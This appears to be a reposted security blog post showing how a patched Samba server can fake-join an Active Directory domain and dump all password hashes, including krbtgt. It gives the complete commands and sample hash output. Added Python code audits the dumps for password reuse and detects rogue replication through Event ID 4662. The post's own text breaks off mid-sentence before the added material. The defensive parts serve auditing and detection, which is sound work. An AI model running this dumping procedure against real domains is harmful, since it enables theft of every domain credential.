opexxx

Dumping NTDS.dit Domain Hashes Using Samba

May 19th, 2014

May 14th, 2014

So there was this blog post by @lanjelot [definitely someone to follow] talking about a number of ways to dump Windows credentials, here: https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/ and at the very bottom of this post it says “AD Replication (EXPERIMENTAL)”.

What it boils down to is this: if you can position a system that can do DNS resolution to the target domain and perform some other UDP traffic, you can fake-join a Samba server you control to the domain, and it doesn't require code execution on the domain controller in any way.

Notice: I am not doing this on a Kali Linux box; there is already an install of Samba there and I didn't want to try uninstalling or modifying the one installed.

First, you need this patch:

wget http://files.securusglobal.com/samba-4.1.0_replication-only-patch.txt

and Samba 4.1.0:

wget http://ftp.samba.org/pub/samba/stable/samba-4.1.0.tar.gz

You will probably also need some dependencies installed:

apt-get install python2.7-dev python-samba libacl1-dev build-essential libldap2-dev libkrb5-dev attr

Since the patch is kinda wonky, you need to make a src directory and extract Samba into there first, then apply the patch from whatever directory is above src.

mkdir src
mv samba-4.1.0.tar.gz src/
cd src/
tar zxvf samba-4.1.0.tar.gz
cd /root/

So it would look like this:

samba-4.1.0_replication-only-patch.txt
src/
src/samba-4.1.0/

Then run patch -p0 < samba-4.1.0_replication-only-patch.txt and build:

cd ./src/samba-4.1.0/
./configure
make
make install

Prepare the box:

rm -rf /var/lib/samba; mkdir /var/lib/samba; rm -f /etc/samba/smb.conf

Next you need to make sure you are resolving correctly (if you can't resolve the SRV record _ldap._tcp.sittingduck.info, sittingduck.info being the domain, then this isn't going to work):

echo nameserver 192.168.92.37 > /etc/resolv.conf # this is the IP address of the DC

Then start the clone:

/usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator

Looks like this:

root@sambabox:~/src/samba-4.1.0# /usr/local/samba/bin/samba-tool domain join sittingduck.info DC -U sittingduck\\administrator
Finding a writeable DC for domain 'sittingduck.info'
Found DC 2K8DC.sittingduck.info
Password for [SITTINGDUCK\administrator]:
workgroup is SITTINGDUCK
realm is sittingduck.info
Calling bare provision
No IPv6 address will be assigned
Provision OK for domain DN DC=sittingduck,DC=info
Starting replication
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Schema-DN[CN=Schema,CN=Configuration,DC=sittingduck,DC=info] objects[1521] linked_values[0]
Analyze and apply schema objects
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[402] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[804] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1206] linked_values[0]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1608] linked_values[1]
Partition[CN=Configuration,DC=sittingduck,DC=info] objects[1614] linked_values[11]
Replicating critical objects from the base DN of the domain
Partition[DC=sittingduck,DC=info] objects[100] linked_values[24]
Partition[DC=sittingduck,DC=info] objects[353] linked_values[27]
Done with always replicated NC (base, config, schema)
Committing SAM database
descriptor_sd_propagation_recursive: DC=DomainDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
descriptor_sd_propagation_recursive: DC=ForestDnsZones,DC=sittingduck,DC=info not found under DC=sittingduck,DC=info
Joined domain SITTINGDUCK (SID S-1-5-21-3147519476-3247671789-820278723) as a DC

Then to get the hashes:

root@sambabox:~# /usr/local/samba/bin/pdbedit -L -w
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:

Or you can do it with history:

root@sambabox:~# python samba-pwdump.py /usr/local/samba/private/sam.ldb.d/DC\=SITTINGDUCK\,DC\=INFO.ldb -history
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::

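Both dumps above use the same leading fields (name:id:LM:NT), and the post's own lab output already shows the audit finding a defender cares most about: Administrator, jdoe and uber share one NT hash, i.e. the same password. The following parser is an added example, not code from the post or from Samba; it reads either the pdbedit -L -w format or the pwdump-style format, folds _historyN entries into their base account, and reports password reuse, stored LM hashes and accounts with no password set, without printing the hashes themselves. The sample input is the post's lab output; the helper names (parse_dump, shared_nt_hashes and so on) are this example's own.

```python
import re
from collections import defaultdict
from typing import Dict, List

# pdbedit prints 32 'X' characters where no hash is stored; the other two
# constants are the well-known LM and NT hashes of the empty password.
NO_HASH = "x" * 32
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# samba-pwdump.py names password-history rows <account>_history<N>.
HISTORY_RE = re.compile(r"^(?P<base>.+)_history\d+$")


def normalize_hash(field: str) -> str:
    """Lower-case a hash field; return '' when it holds no usable hash."""
    h = field.strip().lower()
    return "" if h in ("", NO_HASH, EMPTY_LM, EMPTY_NT) else h


def parse_dump(text: str) -> List[Dict]:
    """Parse pdbedit -w or pwdump-style lines into account records.

    Both formats begin with name:id:LM:NT; later fields (flags, LCT) are ignored.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 4:
            continue
        name, ident, lm, nt = fields[:4]
        m = HISTORY_RE.match(name)
        records.append({"name": name, "base": m.group("base") if m else name,
                        "id": ident, "lm": normalize_hash(lm),
                        "nt": normalize_hash(nt), "history": bool(m)})
    return records


def shared_nt_hashes(records: List[Dict]) -> List[List[str]]:
    """Groups of distinct accounts whose NT hash is identical (password reuse).

    History rows are folded into their base account, so an account that
    matches its own previous password does not count as sharing.
    """
    by_hash = defaultdict(set)
    for r in records:
        if r["nt"]:
            by_hash[r["nt"]].add(r["base"])
    return sorted(sorted(names) for names in by_hash.values() if len(names) > 1)


def accounts_with_lm_hash(records: List[Dict]) -> List[str]:
    """Rows (current or historical) for which a legacy LM hash is still stored."""
    return sorted(r["name"] for r in records if r["lm"])


def no_password_set(records: List[Dict]) -> List[str]:
    """Current accounts whose NT hash is empty or absent."""
    return sorted(r["name"] for r in records if not r["nt"] and not r["history"])


# Lab output copied from the post (pdbedit -L -w format).
PDBEDIT_SAMPLE = """\
2K8DC$:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:CB14F1166BBE1749AC0FB40240C5DC30:[S          ]:LCT-530FC425:
Administrator:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[U          ]:LCT-531006A4:
krbtgt:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:F2EE6AB6F40810169E0E46B126CEFBEF:[DU         ]:LCT-530FC3FF:
nobody:65534:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:[U          ]:LCT-00000000:
jdoe:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-530FC5FF:
uber:4294967295:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:88E4D9FABAECF3DEC18DD80905521B29:[UX         ]:LCT-53101261:
"""

# Lab output copied from the post (samba-pwdump.py -history format).
PWDUMP_SAMPLE = """\
SAMBACLONE$:1104:::::
2K8DC$:1000::cb14f1166bbe1749ac0fb40240c5dc30:::
Administrator:500::88e4d9fabaecf3dec18dd80905521b29:::
krbtgt:502::f2ee6ab6f40810169e0e46b126cefbef:::
Guest:501:::::
jdoe:1103::88e4d9fabaecf3dec18dd80905521b29:::
uber:1105::88e4d9fabaecf3dec18dd80905521b29:::
uber_history0:1105:444d1edcad01ae08f49f073e12e8cc14:88e4d9fabaecf3dec18dd80905521b29:::
"""

if __name__ == "__main__":
    for label, sample in (("pdbedit", PDBEDIT_SAMPLE), ("pwdump", PWDUMP_SAMPLE)):
        recs = parse_dump(sample)
        print(f"[{label}] password reuse groups: {shared_nt_hashes(recs)}")
        print(f"[{label}] LM hash stored for: {accounts_with_lm_hash(recs)}")
        print(f"[{label}] no password set: {no_password_set(recs)}")
```

Run against the post's data, both formats report the same reuse group (Administrator, jdoe, uber); the pwdump sample additionally shows an LM hash retained in uber's password history and two accounts (Guest, SAMBACLONE$) with no NT hash at all.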
Game over. The great thing is that it never actually shows up as a joined box in the domain, and as far as I can tell the only log on the real DC is the login success of a domain admin. Plus one of the huge benefits to this method is that once you have the database Samba makes it really easy to
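The post reports that the only visible trace on the real DC was the domain admin's successful logon. With the Directory Service Access audit subcategory enabled (and a SACL on the domain naming context that audits control-access rights), the DC also records the replication request itself as Event ID 4662, carrying the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access GUIDs in its Properties field; that event is the standard detection handle for any replication-based dump, whether the caller is a patched Samba or another tool. The triage logic below is an added example, not from the post: it joins each 4662 replication request to the 4624 logon session that issued it (4662 has no network address of its own) and flags any request not made by a known DC account from a known DC address. Events are assumed to have been exported as dicts keyed by the Security log's EventData names; the sample events, the second DC (DC2$, 192.168.92.38) and the Samba host's address (192.168.92.50) are constructed, only the DC address 192.168.92.37 comes from the post.

```python
import re
from typing import Dict, Iterable, List

# A 4662 Properties field lists GUIDs in braces, e.g. "{1131f6ad-...}".
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

# Control access rights a replication partner exercises on the domain NC.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def replication_rights_in(properties: str) -> List[str]:
    """Names of the replication rights referenced in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def find_rogue_replication(events: Iterable[Dict], dc_accounts: Iterable[str],
                           dc_ips: Iterable[str]) -> List[Dict[str, str]]:
    """Flag replication requests not made by a known DC from a known DC address.

    4662 names the caller and its logon session (SubjectLogonId) but not an
    IP, so the session is joined back to the 4624 logon that created it.
    """
    events = list(events)
    dc_accounts = {a.lower() for a in dc_accounts}
    dc_ips = set(dc_ips)
    logons = {e["TargetLogonId"]: e for e in events if e["EventID"] == 4624}
    findings = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        rights = replication_rights_in(e.get("Properties", ""))
        if not rights:
            continue  # some other directory access, not replication
        user = e["SubjectUserName"].lower()
        ip = logons.get(e["SubjectLogonId"], {}).get("IpAddress", "unknown")
        if user in dc_accounts and ip in dc_ips:
            continue  # ordinary DC-to-DC replication
        findings.append({"user": e["SubjectUserName"], "source_ip": ip,
                         "logon_id": e["SubjectLogonId"],
                         "rights": ", ".join(rights)})
    return findings


# Constructed sample events (not real log data).
SAMPLE_EVENTS = [
    # Second DC authenticating and pulling changes: expected traffic.
    {"EventID": 4624, "TargetUserName": "DC2$", "IpAddress": "192.168.92.38",
     "TargetLogonId": "0x3e7a1"},
    {"EventID": 4662, "SubjectUserName": "DC2$", "SubjectLogonId": "0x3e7a1",
     "ObjectName": "DC=sittingduck,DC=info",
     "Properties": "Control Access\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Domain admin logging on from the Samba host, then requesting replication.
    {"EventID": 4624, "TargetUserName": "administrator", "IpAddress": "192.168.92.50",
     "TargetLogonId": "0x5f1c02"},
    {"EventID": 4662, "SubjectUserName": "administrator", "SubjectLogonId": "0x5f1c02",
     "ObjectName": "DC=sittingduck,DC=info",
     "Properties": "Control Access\n\t\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
                   "\n\t\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    # Same admin writing an attribute on a user object: not a replication right.
    {"EventID": 4662, "SubjectUserName": "administrator", "SubjectLogonId": "0x5f1c02",
     "ObjectName": "CN=jdoe,CN=Users,DC=sittingduck,DC=info",
     "Properties": "Write Property\n\t\t{bf967a68-0de6-11d0-a285-00aa003049e2}"},
]
KNOWN_DC_ACCOUNTS = ["2K8DC$", "DC2$"]
KNOWN_DC_IPS = ["192.168.92.37", "192.168.92.38"]

if __name__ == "__main__":
    for f in find_rogue_replication(SAMPLE_EVENTS, KNOWN_DC_ACCOUNTS, KNOWN_DC_IPS):
        print(f"ALERT replication by {f['user']} from {f['source_ip']} "
              f"(logon {f['logon_id']}): {f['rights']}")
```

On the sample, only the administrator's request from 192.168.92.50 is raised; DC2's pull and the attribute write are left alone. In production the DC account and address lists come from the Domain Controllers OU and the Sites configuration, and the same join against 4624 gives the source address that the post says is the one thing left in the logs.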